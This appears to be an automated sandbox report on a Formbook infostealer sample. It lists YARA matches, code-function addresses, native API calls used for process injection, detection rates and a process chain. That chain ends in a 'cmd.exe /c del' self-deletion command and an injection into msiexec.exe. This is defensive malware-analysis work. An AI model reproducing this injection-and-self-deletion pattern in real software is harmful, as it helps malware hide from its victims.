          Source: 2.2.rlpjf.exe.400000.1.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.2.rlpjf.exe.400000.1.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.0.rlpjf.exe.400000.9.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.0.rlpjf.exe.400000.9.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.rlpjf.exe.f70000.1.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.rlpjf.exe.f70000.1.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.2.rlpjf.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.2.rlpjf.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.0.rlpjf.exe.400000.5.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.0.rlpjf.exe.400000.5.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.0.rlpjf.exe.400000.7.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.0.rlpjf.exe.400000.7.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.0.rlpjf.exe.400000.9.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.0.rlpjf.exe.400000.9.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.rlpjf.exe.f70000.1.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.rlpjf.exe.f70000.1.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.386123564.0000000001820000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.386123564.0000000001820000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000F.00000002.535781474.0000000000D40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000F.00000002.535781474.0000000000D40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.276935355.0000000000F70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.276935355.0000000000F70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.386017392.0000000001490000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.386017392.0000000001490000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.385893356.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.385893356.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000000.343083736.000000000DA9C000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000000.343083736.000000000DA9C000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000000.273462399.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000000.273462399.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000000.318820789.000000000DA9C000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000000.318820789.000000000DA9C000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000F.00000002.535983795.0000000000F80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000F.00000002.535983795.0000000000F80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000000.274763055.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000000.274763055.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000F.00000002.535866445.0000000000F50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000F.00000002.535866445.0000000000F50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: C:\Users\user\Desktop\lamsddre43321.exe Code function: 0_2_004032FA EntryPoint,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,ExitProcess,OleUninitialize,ExitProcess,lstrcatA,lstrcmpiA,CreateDirectoryA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,
          Source: C:\Users\user\Desktop\lamsddre43321.exe Code function: 0_2_004047EE
          Source: C:\Users\user\Desktop\lamsddre43321.exe Code function: 0_2_00406083
          Source: C:\Users\user\AppData\Local\Temp\rlpjf.exe Code function: 1_2_001A5219
          Source: C:\Users\user\AppData\Local\Temp\rlpjf.exe Code function: 1_2_001B6880
          Source: C:\Users\user\AppData\Local\Temp\rlpjf.exe Code function: 1_2_001B496E
          Source: C:\Users\user\AppData\Local\Temp\rlpjf.exe Code function: 1_2_001B959D
          Source: C:\Users\user\AppData\Local\Temp\rlpjf.exe Code function: 1_2_001B7364
          Source: C:\Users\user\AppData\Local\Temp\rlpjf.exe Code function: 1_2_001B496E
          Source: C:\Users\user\AppData\Local\Temp\rlpjf.exe Code function: 1_2_001B959D
          Source: C:\Users\user\AppData\Local\Temp\rlpjf.exe Code function: 1_2_001B6880
          Source: C:\Users\user\AppData\Local\Temp\rlpjf.exe Code function: 1_2_001B85D1
          Source: C:\Users\user\AppData\Local\Temp\rlpjf.exe Code function: 1_2_001B6DF2
          Source: C:\Users\user\AppData\Local\Temp\rlpjf.exe Code function: 1_2_001B85D1
          Source: C:\Users\user\AppData\Local\Temp\rlpjf.exe Code function: 1_2_001A5267
          Source: C:\Users\user\AppData\Local\Temp\rlpjf.exe Code function: 1_2_001B85D1
          Source: C:\Users\user\AppData\Local\Temp\rlpjf.exe Code function: 1_2_001B7364
          Source: C:\Users\user\AppData\Local\Temp\rlpjf.exe Code function: 1_2_00ED0A64
          Source: C:\Users\user\AppData\Local\Temp\rlpjf.exe Code function: 2_2_001B6880
          Source: C:\Users\user\AppData\Local\Temp\rlpjf.exe Code function: 2_2_001B496E
          Source: C:\Users\user\AppData\Local\Temp\rlpjf.exe Code function: 2_2_001B959D
          Source: C:\Users\user\AppData\Local\Temp\rlpjf.exe Code function: 2_2_001B7364
          Source: C:\Users\user\AppData\Local\Temp\rlpjf.exe Code function: 2_2_001B496E
          Source: C:\Users\user\AppData\Local\Temp\rlpjf.exe Code function: 2_2_001B959D
          Source: C:\Users\user\AppData\Local\Temp\rlpjf.exe Code function: 2_2_001B6880
          Source: C:\Users\user\AppData\Local\Temp\rlpjf.exe Code function: 2_2_001B85D1
          Source: C:\Users\user\AppData\Local\Temp\rlpjf.exe Code function: 2_2_001B6DF2
          Source: C:\Users\user\AppData\Local\Temp\rlpjf.exe Code function: 2_2_001B85D1
          Source: C:\Users\user\AppData\Local\Temp\rlpjf.exe Code function: 2_2_001B85D1
          Source: C:\Users\user\AppData\Local\Temp\rlpjf.exe Code function: 2_2_001B7364
          Source: C:\Users\user\AppData\Local\Temp\rlpjf.exe Code function: 2_2_00401030
          Source: C:\Users\user\AppData\Local\Temp\rlpjf.exe Code function: 2_2_0041D88B
          Source: C:\Users\user\AppData\Local\Temp\rlpjf.exe Code function: 2_2_0041C3E6
          Source: C:\Users\user\AppData\Local\Temp\rlpjf.exe Code function: 2_2_00402D87
          Source: C:\Users\user\AppData\Local\Temp\rlpjf.exe Code function: 2_2_00402D90
          Source: C:\Users\user\AppData\Local\Temp\rlpjf.exe Code function: 2_2_0041D5A6
          Source: C:\Users\user\AppData\Local\Temp\rlpjf.exe Code function: 2_2_0041E5BF
          Source: C:\Users\user\AppData\Local\Temp\rlpjf.exe Code function: 2_2_00409E5B
          Source: C:\Users\user\AppData\Local\Temp\rlpjf.exe Code function: 2_2_00409E60
          Source: C:\Users\user\AppData\Local\Temp\rlpjf.exe Code function: 2_2_00402FB0
          Source: C:\Users\user\AppData\Local\Temp\rlpjf.exe Code function: 2_2_0041D7B1
          Source: C:\Windows\SysWOW64\msiexec.exe Code function: 15_2_05092D07
          Source: C:\Windows\SysWOW64\msiexec.exe Code function: 15_2_05091D55
          Source: C:\Windows\SysWOW64\msiexec.exe Code function: 15_2_050925DD
          Source: C:\Windows\SysWOW64\msiexec.exe Code function: 15_2_04FD841F
          Source: C:\Windows\SysWOW64\msiexec.exe Code function: 15_2_04FDD5E0
          Source: C:\Windows\SysWOW64\msiexec.exe Code function: 15_2_0508D466
          Source: C:\Windows\SysWOW64\msiexec.exe Code function: 15_2_04FF2581
          Source: C:\Windows\SysWOW64\msiexec.exe Code function: 15_2_04FC0D20
          Source: C:\Windows\SysWOW64\msiexec.exe Code function: 15_2_0509DFCE
          Source: C:\Windows\SysWOW64\msiexec.exe Code function: 15_2_04FE6E30
          Source: C:\Windows\SysWOW64\msiexec.exe Code function: 15_2_05091FF1
          Source: C:\Windows\SysWOW64\msiexec.exe Code function: 15_2_0508D616
          Source: C:\Windows\SysWOW64\msiexec.exe Code function: 15_2_05092EF7
          Source: C:\Windows\SysWOW64\msiexec.exe Code function: 15_2_04FF20A0
          Source: C:\Windows\SysWOW64\msiexec.exe Code function: 15_2_04FDB090
          Source: C:\Windows\SysWOW64\msiexec.exe Code function: 15_2_05081002
          Source: C:\Windows\SysWOW64\msiexec.exe Code function: 15_2_0509E824
          Source: C:\Windows\SysWOW64\msiexec.exe Code function: 15_2_050920A8
          Source: C:\Windows\SysWOW64\msiexec.exe Code function: 15_2_04FE4120
          Source: C:\Windows\SysWOW64\msiexec.exe Code function: 15_2_050928EC
          Source: C:\Windows\SysWOW64\msiexec.exe Code function: 15_2_04FCF900
          Source: C:\Windows\SysWOW64\msiexec.exe Code function: 15_2_05092B28
          Source: C:\Windows\SysWOW64\msiexec.exe Code function: 15_2_050803DA
          Source: C:\Windows\SysWOW64\msiexec.exe Code function: 15_2_0508DBD2
          Source: C:\Windows\SysWOW64\msiexec.exe Code function: 15_2_04FFEBB0
          Source: C:\Windows\SysWOW64\msiexec.exe Code function: 15_2_050922AE
          Source: C:\Windows\SysWOW64\msiexec.exe Code function: 15_2_00D5D88B
          Source: C:\Windows\SysWOW64\msiexec.exe Code function: 15_2_00D5C3E6
          Source: C:\Windows\SysWOW64\msiexec.exe Code function: 15_2_00D42D90
          Source: C:\Windows\SysWOW64\msiexec.exe Code function: 15_2_00D42D87
          Source: C:\Windows\SysWOW64\msiexec.exe Code function: 15_2_00D5E5BF
          Source: C:\Windows\SysWOW64\msiexec.exe Code function: 15_2_00D5D5A6
          Source: C:\Windows\SysWOW64\msiexec.exe Code function: 15_2_00D49E5B
          Source: C:\Windows\SysWOW64\msiexec.exe Code function: 15_2_00D49E60
          Source: C:\Windows\SysWOW64\msiexec.exe Code function: 15_2_00D42FB0
          Source: C:\Windows\SysWOW64\msiexec.exe Code function: 15_2_00D5D7B1
          Source: C:\Windows\SysWOW64\msiexec.exe Code function: String function: 04FCB150 appears 45 times
          Source: C:\Users\user\AppData\Local\Temp\rlpjf.exe Code function: String function: 001AEFF0 appears 42 times
          Source: C:\Users\user\AppData\Local\Temp\rlpjf.exe Code function: 2_2_0041A360 NtCreateFile,
          Source: C:\Users\user\AppData\Local\Temp\rlpjf.exe Code function: 2_2_0041A410 NtReadFile,
          Source: C:\Users\user\AppData\Local\Temp\rlpjf.exe Code function: 2_2_0041A490 NtClose,
          Source: C:\Users\user\AppData\Local\Temp\rlpjf.exe Code function: 2_2_0041A540 NtAllocateVirtualMemory,
          Source: C:\Users\user\AppData\Local\Temp\rlpjf.exe Code function: 2_2_0041A48A NtClose,
          Source: C:\Users\user\AppData\Local\Temp\rlpjf.exe Code function: 2_2_0041A53B NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\msiexec.exe Code function: 15_2_05009540 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msiexec.exe Code function: 15_2_050095D0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msiexec.exe Code function: 15_2_05009710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msiexec.exe Code function: 15_2_05009780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msiexec.exe Code function: 15_2_05009FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msiexec.exe Code function: 15_2_050096D0 NtCreateKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msiexec.exe Code function: 15_2_050096E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msiexec.exe Code function: 15_2_05009910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msiexec.exe Code function: 15_2_050099A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msiexec.exe Code function: 15_2_05009840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msiexec.exe Code function: 15_2_05009860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msiexec.exe Code function: 15_2_05009A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msiexec.exe Code function: 15_2_05009520 NtWaitForSingleObject,
          Source: C:\Windows\SysWOW64\msiexec.exe Code function: 15_2_0500AD30 NtSetContextThread,
          Source: C:\Windows\SysWOW64\msiexec.exe Code function: 15_2_05009560 NtWriteFile,
          Source: C:\Windows\SysWOW64\msiexec.exe Code function: 15_2_050095F0 NtQueryInformationFile,
          Source: C:\Windows\SysWOW64\msiexec.exe Code function: 15_2_0500A710 NtOpenProcessToken,
          Source: C:\Windows\SysWOW64\msiexec.exe Code function: 15_2_05009730 NtQueryVirtualMemory,
          Source: C:\Windows\SysWOW64\msiexec.exe Code function: 15_2_05009760 NtOpenProcess,
          Source: C:\Windows\SysWOW64\msiexec.exe Code function: 15_2_0500A770 NtOpenThread,
          Source: C:\Windows\SysWOW64\msiexec.exe Code function: 15_2_05009770 NtSetInformationFile,
          Source: C:\Windows\SysWOW64\msiexec.exe Code function: 15_2_050097A0 NtUnmapViewOfSection,
          Source: C:\Windows\SysWOW64\msiexec.exe Code function: 15_2_05009610 NtEnumerateValueKey,
          Source: C:\Windows\SysWOW64\msiexec.exe Code function: 15_2_05009650 NtQueryValueKey,
          Source: C:\Windows\SysWOW64\msiexec.exe Code function: 15_2_05009660 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\msiexec.exe Code function: 15_2_05009670 NtQueryInformationProcess,
          Source: C:\Windows\SysWOW64\msiexec.exe Code function: 15_2_05009950 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\msiexec.exe Code function: 15_2_050099D0 NtCreateProcessEx,
          Source: C:\Windows\SysWOW64\msiexec.exe Code function: 15_2_05009820 NtEnumerateKey,
          Source: C:\Windows\SysWOW64\msiexec.exe Code function: 15_2_0500B040 NtSuspendThread,
          Source: C:\Windows\SysWOW64\msiexec.exe Code function: 15_2_050098A0 NtWriteVirtualMemory,
          Source: C:\Windows\SysWOW64\msiexec.exe Code function: 15_2_050098F0 NtReadVirtualMemory,
          Source: C:\Windows\SysWOW64\msiexec.exe Code function: 15_2_05009B00 NtSetValueKey,
          Source: C:\Windows\SysWOW64\msiexec.exe Code function: 15_2_0500A3B0 NtGetContextThread,
          Source: C:\Windows\SysWOW64\msiexec.exe Code function: 15_2_05009A00 NtProtectVirtualMemory,
          Source: C:\Windows\SysWOW64\msiexec.exe Code function: 15_2_05009A10 NtQuerySection,
          Source: C:\Windows\SysWOW64\msiexec.exe Code function: 15_2_05009A20 NtResumeThread,
          Source: C:\Windows\SysWOW64\msiexec.exe Code function: 15_2_05009A80 NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\msiexec.exe Code function: 15_2_00D5A360 NtCreateFile,
          Source: C:\Windows\SysWOW64\msiexec.exe Code function: 15_2_00D5A490 NtClose,
          Source: C:\Windows\SysWOW64\msiexec.exe Code function: 15_2_00D5A410 NtReadFile,
          Source: C:\Windows\SysWOW64\msiexec.exe Code function: 15_2_00D5A48A NtClose,
          Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: sfc.dll
          Source: lamsddre43321.exe Virustotal: Detection: 43%
          Source: lamsddre43321.exe ReversingLabs: Detection: 39%
          Source: C:\Users\user\Desktop\lamsddre43321.exe File read: C:\Users\user\Desktop\lamsddre43321.exe
          Source: lamsddre43321.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\lamsddre43321.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: unknown Process created: C:\Users\user\Desktop\lamsddre43321.exe "C:\Users\user\Desktop\lamsddre43321.exe"
          Source: C:\Users\user\Desktop\lamsddre43321.exe Process created: C:\Users\user\AppData\Local\Temp\rlpjf.exe C:\Users\user\AppData\Local\Temp\rlpjf.exe C:\Users\user\AppData\Local\Temp\ojshmy
          Source: C:\Users\user\AppData\Local\Temp\rlpjf.exe Process created: C:\Users\user\AppData\Local\Temp\rlpjf.exe C:\Users\user\AppData\Local\Temp\rlpjf.exe C:\Users\user\AppData\Local\Temp\ojshmy
          Source: C:\Users\user\AppData\Local\Temp\rlpjf.exe Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe
          Source: C:\Windows\SysWOW64\msiexec.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\AppData\Local\Temp\rlpjf.exe"
          Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\lamsddre43321.exe Process created: C:\Users\user\AppData\Local\Temp\rlpjf.exe C:\Users\user\AppData\Local\Temp\rlpjf.exe C:\Users\user\AppData\Local\Temp\ojshmy
          Source: C:\Users\user\AppData\Local\Temp\rlpjf.exe Process created: C:\Users\user\AppData\Local\Temp\rlpjf.exe C:\Users\user\AppData\Local\Temp\rlpjf.exe C:\Users\user\AppData\Local\Temp\ojshmy
          Source: C:\Users\user\AppData\Local\Temp\rlpjf.exe Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe
          Source: C:\Windows\SysWOW64\msiexec.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\AppData\Local\Temp\rlpjf.exe"
          Source: C:\Users\user\Desktop\lamsddre43321.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
          Source: C:\Users\user\Desktop\lamsddre43321.exe File created: C:\Users\user\AppData\Local\Temp\nsrD707.tmp
          Source: classification engine Classification label: mal100.troj.evad.winEXE@10/4@2/2
          Source: C:\Users\user\Desktop\lamsddre43321.exe Code function: 0_2_00402078 CoCreateInstance,MultiByteToWideChar,
          Source: C:\Users\user\Desktop\lamsddre43321.exe File read: C:\Users\desktop.ini
          Source: C:\Users\user\Desktop\lamsddre43321.exe Code function: 0_2_00404333 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,
          Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6196:120:WilError_01
          Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts
          Source: Binary string: msiexec.pdb source: rlpjf.exe, 00000002.00000002.387098947.00000000038D0000.00000040.10000000.00040000.00000000.sdmp
          Source: Binary string: msiexec.pdbGCTL source: rlpjf.exe, 00000002.00000002.387098947.00000000038D0000.00000040.10000000.00040000.00000000.sdmp
